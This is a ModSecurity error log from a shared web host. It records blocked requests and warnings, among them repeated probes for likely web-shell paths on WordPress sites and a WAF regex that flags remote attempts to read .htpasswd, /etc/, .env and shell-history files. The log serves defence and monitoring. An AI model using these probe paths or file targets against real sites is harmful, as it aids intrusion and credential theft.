[Tue May 26 13:48:18.979505 2026] [security2:error] [pid 544395:tid 544601] [client 173.252.69.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVXShmrs7g3RMCdp8XwIwAAAEw"]
[Tue May 26 13:48:19.124005 2026] [security2:error] [pid 544395:tid 544596] [client 15.235.169.50:54764] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/wp-catcher/cong.php"] [unique_id "ahVXSxmrs7g3RMCdp8XwLAAAAEc"]
[Tue May 26 13:48:19.426407 2026] [security2:error] [pid 544395:tid 544623] [client 4.201.75.230:6087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/chosen.php"] [unique_id "ahVXSxmrs7g3RMCdp8XwNQAAAGI"]
[Tue May 26 13:48:19.509603 2026] [security2:error] [pid 544395:tid 544529] [client 45.148.10.159:60452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/api/objects/codes.php.save"] [unique_id "ahVXSxmrs7g3RMCdp8XwNgAAAAQ"]
[Tue May 26 13:48:19.887316 2026] [security2:error] [pid 544395:tid 544600] [client 15.235.169.50:54846] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/wp-login.php"] [unique_id "ahVXSxmrs7g3RMCdp8XwOAAAAEs"]
[Tue May 26 13:48:20.358223 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXS8jqAquC0YaxQjCn5wAAAYI"]
[Tue May 26 13:48:20.388041 2026] [security2:error] [pid 555743:tid 555969] [client 15.235.169.50:54965] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/duck.php"] [unique_id "ahVXTMjqAquC0YaxQjCn-QAAAWo"]
[Tue May 26 13:48:20.579926 2026] [security2:error] [pid 555743:tid 555917] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXTMjqAquC0YaxQjCn_gAAATY"]
[Tue May 26 13:48:21.368469 2026] [security2:error] [pid 544395:tid 544644] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXTBmrs7g3RMCdp8XwTgAAAHc"]
[Tue May 26 13:48:21.810731 2026] [security2:error] [pid 555743:tid 555966] [client 74.7.241.190:33032] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahVXTcjqAquC0YaxQjCoKgABZzU"]
[Tue May 26 13:48:22.056136 2026] [security2:error] [pid 555743:tid 555888] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXTcjqAquC0YaxQjCoLwAAARk"]
[Tue May 26 13:48:22.131743 2026] [security2:error] [pid 555743:tid 555956] [client 15.235.169.50:55242] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/seoo/alfanew.php"] [unique_id "ahVXTsjqAquC0YaxQjCoMgAAAV0"]
[Tue May 26 13:48:22.449476 2026] [security2:error] [pid 555743:tid 555876] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXTsjqAquC0YaxQjCoNwAAAQ0"]
[Tue May 26 13:48:22.609632 2026] [security2:error] [pid 544395:tid 544549] [client 15.235.169.50:55310] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/pridmag/byp.php"] [unique_id "ahVXThmrs7g3RMCdp8XwYwAAABg"]
[Tue May 26 13:48:22.687731 2026] [security2:error] [pid 555743:tid 555910] [client 31.57.184.107:49410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.rathnaa.co.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVXTsjqAquC0YaxQjCoOwAAAS8"], referer: https://www.google.com/
[Tue May 26 13:48:22.793257 2026] [security2:error] [pid 555743:tid 555949] [client 103.4.251.33:9494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXTsjqAquC0YaxQjCoQwAAAVY"]
[Tue May 26 13:48:23.077571 2026] [security2:error] [pid 555743:tid 555882] [client 15.235.169.50:55383] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cux.php"] [unique_id "ahVXT8jqAquC0YaxQjCoTwAAARM"]
[Tue May 26 13:48:23.274349 2026] [security2:error] [pid 544395:tid 544608] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXThmrs7g3RMCdp8XwawAAAFM"]
[Tue May 26 13:48:23.629010 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:55477] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.tmb/file.php"] [unique_id "ahVXT8jqAquC0YaxQjCoXgAAATs"]
[Tue May 26 13:48:23.804082 2026] [security2:error] [pid 555743:tid 555981] [client 103.4.250.155:4158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXT8jqAquC0YaxQjCocwAAAXY"]
[Tue May 26 13:48:23.961781 2026] [security2:error] [pid 555743:tid 555902] [client 45.148.10.159:36002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/getcpuutil.php-bakworking"] [unique_id "ahVXT8jqAquC0YaxQjColQAAASc"]
[Tue May 26 13:48:24.137954 2026] [security2:error] [pid 544395:tid 544616] [client 15.235.169.50:55603] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin.php"] [unique_id "ahVXUBmrs7g3RMCdp8XwlgAAAFs"]
[Tue May 26 13:48:24.255315 2026] [security2:error] [pid 544395:tid 544652] [client 162.158.182.165:13834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahVXUBmrs7g3RMCdp8XwlQAAAH8"]
[Tue May 26 13:48:24.302207 2026] [security2:error] [pid 544395:tid 544582] [client 106.192.248.115:61791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXUBmrs7g3RMCdp8XwngAAADk"]
[Tue May 26 13:48:24.306532 2026] [security2:error] [pid 544395:tid 544582] [client 106.192.248.115:61791] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXUBmrs7g3RMCdp8XwngAAADk"]
[Tue May 26 13:48:24.608390 2026] [security2:error] [pid 544395:tid 544544] [client 15.235.169.50:55669] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Requests/network.php"] [unique_id "ahVXUBmrs7g3RMCdp8XwqwAAABM"]
[Tue May 26 13:48:24.917609 2026] [security2:error] [pid 555743:tid 555976] [client 4.201.75.230:5251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/defaults.php"] [unique_id "ahVXUMjqAquC0YaxQjCotgAAAXE"]
[Tue May 26 13:48:25.067101 2026] [security2:error] [pid 544395:tid 544620] [client 15.235.169.50:55721] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/content.php"] [unique_id "ahVXURmrs7g3RMCdp8XwtgAAAF8"]
[Tue May 26 13:48:25.127783 2026] [security2:error] [pid 555743:tid 555929] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXUcjqAquC0YaxQjCouwAAAUI"]
[Tue May 26 13:48:25.242990 2026] [security2:error] [pid 555743:tid 555928] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXUMjqAquC0YaxQjCorwAAAUE"]
[Tue May 26 13:48:25.439213 2026] [security2:error] [pid 555743:tid 555971] [client 162.158.182.164:10467] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahVXUMjqAquC0YaxQjCorQABbC8"]
[Tue May 26 13:48:25.552397 2026] [security2:error] [pid 555743:tid 555883] [client 15.235.169.50:55783] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes.php"] [unique_id "ahVXUcjqAquC0YaxQjCoxAAAARQ"]
[Tue May 26 13:48:25.888927 2026] [security2:error] [pid 555743:tid 555904] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXUcjqAquC0YaxQjCozwAAASk"]
[Tue May 26 13:48:26.031922 2026] [security2:error] [pid 555743:tid 555891] [client 15.235.169.50:55843] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/wp-cron.php"] [unique_id "ahVXUsjqAquC0YaxQjCo1QAAARw"]
[Tue May 26 13:48:26.278160 2026] [security2:error] [pid 555743:tid 555919] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXUsjqAquC0YaxQjCo2QAAATg"]
[Tue May 26 13:48:26.531004 2026] [security2:error] [pid 555743:tid 555957] [client 15.235.169.50:55912] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVXUsjqAquC0YaxQjCo5wAAAV4"]
[Tue May 26 13:48:26.605773 2026] [security2:error] [pid 544395:tid 544492] [remote 193.42.61.12:40660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVXUhmrs7g3RMCdp8XwwwAAZmA"]
[Tue May 26 13:48:26.795305 2026] [security2:error] [pid 544395:tid 544579] [client 66.249.89.128:47302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXTxmrs7g3RMCdp8XwegAAADY"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:26.842066 2026] [security2:error] [pid 555743:tid 555994] [client 129.222.147.134:14180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXUsjqAquC0YaxQjCo7AAAAYM"]
[Tue May 26 13:48:26.842244 2026] [security2:error] [pid 555743:tid 555994] [client 129.222.147.134:14180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXUsjqAquC0YaxQjCo7AAAAYM"]
[Tue May 26 13:48:27.046763 2026] [security2:error] [pid 555743:tid 555873] [client 15.235.169.50:55985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/about_php1.php"] [unique_id "ahVXU8jqAquC0YaxQjCo-wAAAQo"]
[Tue May 26 13:48:27.290678 2026] [security2:error] [pid 555743:tid 555954] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXUsjqAquC0YaxQjCo8gAAAVs"]
[Tue May 26 13:48:27.519685 2026] [security2:error] [pid 555743:tid 555962] [client 15.235.169.50:56083] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/gif.php"] [unique_id "ahVXU8jqAquC0YaxQjCpBwAAAWM"]
[Tue May 26 13:48:27.565877 2026] [security2:error] [pid 544395:tid 544582] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXUxmrs7g3RMCdp8Xw2AAAADk"]
[Tue May 26 13:48:27.998532 2026] [security2:error] [pid 544395:tid 544576] [client 15.235.169.50:56161] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/file.php"] [unique_id "ahVXUxmrs7g3RMCdp8Xw4AAAADM"]
[Tue May 26 13:48:28.127404 2026] [security2:error] [pid 544395:tid 544644] [client 66.249.89.140:64955] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXUxmrs7g3RMCdp8Xw0QAAAHc"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:28.249414 2026] [security2:error] [pid 555743:tid 555986] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVMjqAquC0YaxQjCpEAAAAXs"]
[Tue May 26 13:48:28.457806 2026] [security2:error] [pid 555743:tid 555916] [client 15.235.169.50:56227] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/classwithtostring.php"] [unique_id "ahVXVMjqAquC0YaxQjCpHAAAATU"]
[Tue May 26 13:48:28.548701 2026] [security2:error] [pid 555743:tid 555879] [client 20.205.111.246:1576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/100.php"] [unique_id "ahVXVMjqAquC0YaxQjCpHQAAARA"]
[Tue May 26 13:48:28.655372 2026] [security2:error] [pid 555743:tid 555884] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVMjqAquC0YaxQjCpIgAAARU"]
[Tue May 26 13:48:28.849588 2026] [security2:error] [pid 544395:tid 544649] [client 165.140.119.146:52603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXVBmrs7g3RMCdp8Xw8QAAAHw"], referer: https://www.bloggertarget.com
[Tue May 26 13:48:28.849715 2026] [security2:error] [pid 544395:tid 544649] [client 165.140.119.146:52603] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXVBmrs7g3RMCdp8Xw8QAAAHw"], referer: https://www.bloggertarget.com
[Tue May 26 13:48:28.906547 2026] [security2:error] [pid 555743:tid 555972] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVMjqAquC0YaxQjCpPQAAAW0"]
[Tue May 26 13:48:28.917533 2026] [security2:error] [pid 555743:tid 555984] [client 15.235.169.50:56285] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/file.php"] [unique_id "ahVXVMjqAquC0YaxQjCpQQAAAXk"]
[Tue May 26 13:48:29.031305 2026] [security2:error] [pid 544395:tid 544526] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXVBmrs7g3RMCdp8Xw7wAAAAE"]
[Tue May 26 13:48:29.132039 2026] [security2:error] [pid 544395:tid 544610] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVRmrs7g3RMCdp8Xw9AAAAFU"]
[Tue May 26 13:48:29.213762 2026] [security2:error] [pid 544395:tid 544557] [client 66.249.89.140:64955] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVXVBmrs7g3RMCdp8Xw6gAAACA"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 13:48:29.234803 2026] [security2:error] [pid 555743:tid 555978] [client 20.205.111.246:1547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/222.php"] [unique_id "ahVXVcjqAquC0YaxQjCpVAAAAXM"]
[Tue May 26 13:48:29.392664 2026] [security2:error] [pid 555743:tid 555955] [client 15.235.169.50:56375] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/images/media/about.php"] [unique_id "ahVXVcjqAquC0YaxQjCpXgAAAVw"]
[Tue May 26 13:48:29.662471 2026] [security2:error] [pid 544395:tid 544570] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVRmrs7g3RMCdp8XxBwAAAC0"]
[Tue May 26 13:48:29.892966 2026] [security2:error] [pid 555743:tid 555970] [client 15.235.169.50:56454] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/worksec.php"] [unique_id "ahVXVcjqAquC0YaxQjCpcAAAAWs"]
[Tue May 26 13:48:29.900130 2026] [security2:error] [pid 555743:tid 555936] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXVcjqAquC0YaxQjCpbgAAAUk"]
[Tue May 26 13:48:29.925161 2026] [security2:error] [pid 544395:tid 544578] [client 20.205.111.246:2137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/adminfuns.php"] [unique_id "ahVXVRmrs7g3RMCdp8XxEAAAADU"]
[Tue May 26 13:48:29.956959 2026] [security2:error] [pid 544395:tid 544643] [client 146.174.179.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXVRmrs7g3RMCdp8XxBAAAAHY"]
